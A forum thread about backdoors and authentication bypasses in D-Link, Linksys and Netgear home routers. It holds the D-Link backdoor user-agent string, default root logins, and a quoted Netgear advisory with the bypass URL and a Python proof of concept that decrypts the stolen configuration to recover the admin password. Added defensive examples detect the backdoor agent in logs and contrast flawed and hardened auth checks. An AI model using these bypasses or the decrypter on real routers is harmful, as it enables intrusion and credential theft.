Do you have D-Link router ? If so, stop using it - You're not safe

Adam Howard

Well-known member
#1
The Web interface for some D-Link routers could be accessed if a browser's user agent string is set to xmlset_roodkcableoj28840ybtide.

Curiously, if the second half of the user agent string is reversed and the number is removed, it reads "edit by joel backdoor," suggesting it was intentionally placed there.

The affected models likely include D-Link's DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240 and possibly the DIR-615. The same firmware is also used in the BRL-04UR and BRL-04CW routers.

Personally, I would recommend a TP-Link router (ref link) as a replacement. That's basically what I use.
 
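A defender-side check for the user agent string named in this post, added here as an example and not part of the original thread: it shows the reversed reading of the string and flags requests carrying that agent in combined-format web server logs (the log lines, addresses and paths below are constructed).

```python
import re

# Backdoor user agent named in the post above
BACKDOOR_UA = "xmlset_roodkcableoj28840ybtide"

def decode_backdoor_marker(ua: str) -> str:
    """Reverse the part after the underscore and drop the digits; the result
    reads as the 'edit by joel backdoor' string the post describes."""
    tail = ua.split("_", 1)[1]
    return re.sub(r"\d", "", tail[::-1])

# Parser for Apache/nginx combined-format access log lines
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def find_backdoor_requests(log_lines):
    """Return (client_ip, request_line, status) for each request whose user
    agent contains the backdoor string (substring match, so a padded or
    prefixed agent is still caught)."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and BACKDOOR_UA in m.group("ua"):
            hits.append((m.group("ip"), m.group("req"), int(m.group("status"))))
    return hits

# Constructed sample log: documentation addresses, made-up paths
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Oct/2013:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [12/Oct/2013:10:00:05 +0000] "GET /admin.html HTTP/1.1" 200 2048 "-" "xmlset_roodkcableoj28840ybtide"',
    '192.0.2.10 - - [12/Oct/2013:10:00:09 +0000] "GET /admin.html HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(decode_backdoor_marker(BACKDOOR_UA))
    for ip, req, status in find_backdoor_requests(SAMPLE_LOG):
        print(f"ALERT backdoor user agent from {ip}: {req} -> {status}")
```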

Adam Howard

Well-known member
#2
Got a Linksys router and think you're safe? :cautious:
Even changed the default user name and password? :cautious:
Or perhaps you turned off remote sign-in in order to be safer? :cautious:

Feeling safe? :sneaky:

Type in 192.168.1.1 or even (better) your remote IP address (the one your ISP has assigned you), since that is what anyone else would use to reach you... (whatismyip.com)

user name: root
password: admin

or

user name: root
password: root

Your user name and password don't mean anything. Depending on your model, you just logged in as root, bypassing whatever user name and password you had before (and on some models even if you had remote log-in turned off).
:eek:
 

infis

Well-known member
#6
Use Mikrotik routers. These are very advanced routers with convenient management. And forget about D-Link: they have a lot of bugs, are badly set up, overheat, and have poor performance.
 

SneakyDave

Well-known member
#7
Got a Linksys router and think you're safe? :cautious:
Even changed the default user name and password? :cautious:
Or perhaps you turned off remote sign-in in order to be safer? :cautious:

Feeling safe? :sneaky:

Type in 192.168.1.1 or even (better) your remote IP address (the one your ISP has assigned you), since that is what anyone else would use to reach you... (whatismyip.com)

user name: root
password: admin

or

user name: root
password: root

Your user name and password don't mean anything. Depending on your model, you just logged in as root, bypassing whatever user name and password you had before (and on some models even if you had remote log-in turned off).
:eek:
FUD, from December 2012. :rolleyes:
http://thenextweb.com/insider/2013/...t-vulnerability-giving-attackers-full-access/
 

Adam Howard

Well-known member
#8
What, no NETGEAR backdoors? Drat ;)
Got Netgear and feeling safe? :cautious:

http://xenforo.com/community/thread...op-using-it-youre-not-safe.61738/#post-655761

^ Some Netgear routers are also affected by the root exploit. :eek: But this one isn't as clear-cut as Linksys. :confused: You could have two of the same kind of router (model and firmware) and maybe only one of them (or both) could be breached remotely using root.

This suggests that it may be a chipset difference, because at one time Netgear was in the middle of changing where those were manufactured.

So try it and play Russian Roulette.... Feeling lucky? :cautious:

I still recommend TP-Link Routers. Nothing found in them thus far.
 

Adam Howard

Well-known member
#10
I have Netgear, it's great, but not Netgreat.
I'd like to blame autocorrect on that one, but nope, totally me. I had a friend once who kept calling them that to be silly. And from time to time, when I'm typing away fast... I end up doing it.

Thanks for the heads up. Fixed it. :)
 

EQnoble

Well-known member
#13
What, no NETGEAR backdoors? Drat ;)
Not so much a backdoor... but it can still be a problem...

Authentication bypass on Netgear WNR1000
========================================

[ADVISORY INFORMATION]
Title: Authentication bypass on Netgear WNR1000
Discovery date: 10/11/2012
Release date: 29/03/2013
Credits: Roberto Paleari (roberto@greyhats.it, twitter: @rpaleari)

[VULNERABILITY INFORMATION]
Class: Authentication bypass, weak encryption

[AFFECTED PRODUCTS]
This security vulnerability affects the following products and firmware
versions:
* Netgear WNR1000v3, firmware version < 1.0.2.60

Other products and firmware versions are probably also vulnerable, but they
were not checked.

[VULNERABILITY DETAILS]
The web server running on the affected devices is subject to an authentication
bypass issue that allows an attacker to gain administrative access, circumventing
existing authentication mechanisms.

Strictly speaking, the web server skips authentication checks for some URLs,
such as those that contain the substring ".jpg" (without quotes). As a
consequence, an attacker can retrieve the current device configuration by
accessing the following URL:

http://<target-ip-address>/NETGEAR_fwpt.cfg?.jpg

The resulting configuration file is encrypted. However, the device implements a
trivial encryption scheme that can be reversed quite easily. From the
configuration file, attackers can extract, among other things, the
clear-text password for the "admin" user.

A Python procedure that implements the aforementioned encryption scheme
follows (the code of this PoC is inefficient and is quite a mess):

<cut>
import sys

import pyDes  # third-party DES implementation used by the original PoC

# Encryption key is a slight variation of "NtgrBak" (0x56-8 == 0x4e == 'N');
# the trailing 0x00 is read by the last 7-bit extraction below
KEY = [0x56-8, 0x74, 0x67, 0x72, 0x42, 0x61, 0x6b, 0x00]

def derive_des_key(ascii_key):
    # Spread the 56 key bits over 8 bytes, 7 bits each, low (parity) bit cleared
    def extract_by_offset(offset):
        byte_index = offset >> 3
        bit_index = byte_index << 3
        v0 = (ascii_key[byte_index] << 8) | ascii_key[byte_index+1]
        v1 = 8 - (offset - bit_index)
        v0 >>= v1
        return v0 & 0xfe

    k = bytearray()
    for i in range(0, 7*8, 7):
        k.append(extract_by_offset(i))
    return bytes(k)

def decrypt_block(block, key_bytes):
    k = derive_des_key(key_bytes)
    des = pyDes.des(k, pyDes.ECB)
    r = des.decrypt(block)
    return r

def main():
    # Read the raw encrypted config from stdin (binary, 8-byte DES blocks)
    data = sys.stdin.buffer.read()
    assert (len(data) % 8) == 0

    current_key = KEY[:]

    r = b""
    for i in range(0, len(data), 8):
        # The first key byte advances by 8 for every block, carrying into the second
        current_key[0] += 8
        if current_key[0] > 0xff:
            current_key[0] = current_key[0] - 0x100
            current_key[1] += 1

        block = data[i:i+8]
        d = decrypt_block(block, current_key)

        r += d

    sys.stdout.buffer.write(r)

if __name__ == "__main__":
    main()
</cut>


[REMEDIATION]
This issue has been addressed by Netgear with firmware version 1.0.2.60.

[DISCLAIMER]
The author is not responsible for the misuse of the information provided in
this security advisory. The advisory is a service to the professional security
community. There are NO WARRANTIES with regard to this information. Any
application or distribution of this information constitutes acceptance AS IS,
at the user's own risk. This information is subject to change without notice.
 
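The bypass in the advisory above comes down to where the "is this a public image?" decision is made. The following comparison is an added example, not code from the advisory or from the device firmware: a substring check of the kind the advisory describes, next to a check that decides on the decoded and normalised path only (the public directory name is an assumption).

```python
import posixpath
from urllib.parse import unquote, urlsplit

# Flawed decision of the kind the advisory describes: the whole URL, query
# string included, is searched for ".jpg", so "?.jpg" makes any page public.
def needs_auth_substring(url: str) -> bool:
    return ".jpg" not in url

# Hardened decision: only the path component counts, it is decoded and
# normalised first, and only files under an assumed public directory with a
# listed extension are exempt. Everything else requires authentication.
PUBLIC_DIR = "/images/"                 # assumption, not a real device path
PUBLIC_SUFFIXES = (".jpg", ".gif", ".css")

def needs_auth_path_based(url: str) -> bool:
    raw_path = urlsplit(url).path                   # drops ?query and #fragment
    path = posixpath.normpath(unquote(raw_path))    # decode, then collapse "../"
    if not path.startswith(PUBLIC_DIR):
        return True
    return not path.lower().endswith(PUBLIC_SUFFIXES)

def compare(url: str):
    """Return (substring_check, path_check) for one request URL."""
    return needs_auth_substring(url), needs_auth_path_based(url)

if __name__ == "__main__":
    for u in ("/images/logo.jpg",
              "/NETGEAR_fwpt.cfg?.jpg",             # the advisory's bypass URL
              "/images/../NETGEAR_fwpt.cfg",
              "/images/%2e%2e/NETGEAR_fwpt.cfg"):
        print(u, compare(u))
```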

EQnoble

Well-known member
#15
I use Linksys... USED TO LOVE THEM...

Now I hate them... all because of this ****ty Cisco Cloud Connect firmware.
I won't go so far as to say I hate them... but yeah, there is no reason they need firmware updates that let them track my browsing history at the gateway to my home network.
 

EQnoble

Well-known member
#17
If you really want to secure your router, hide the SSID, implement a MAC Address filter, use WPA2, and disallow logins to the admin interface through wifi. Most home routers should have those features and they're pretty easy to set up.
Not broadcasting the SSID does nothing really, unless you are talking about the cases where people don't change the default password and someone is being a nosy pest. Someone who knows what they are doing is going to see your BSSID, the channel you use and eventually your ESSID no matter what you do. And then, to a slightly skilled person, the MAC filter is useless as well: a couple of pings, a handshake or two, and someone can just borrow a whitelisted MAC address already on your network and then gain access using your passphrase or key, which they can get in plain text with relative ease if they have already done any of this.

Either way, even if someone doesn't do any of that... if your router has a vulnerability such as accepting random requests for plain text config files, it doesn't really matter what settings you set.

The odd thing is, when someone's network gets hacked... it is highly probable that the only reason they were able to gain access to the wireless network in the first place is because the router was communicating with clients over the air.

Wireless networks are weak sauce in general.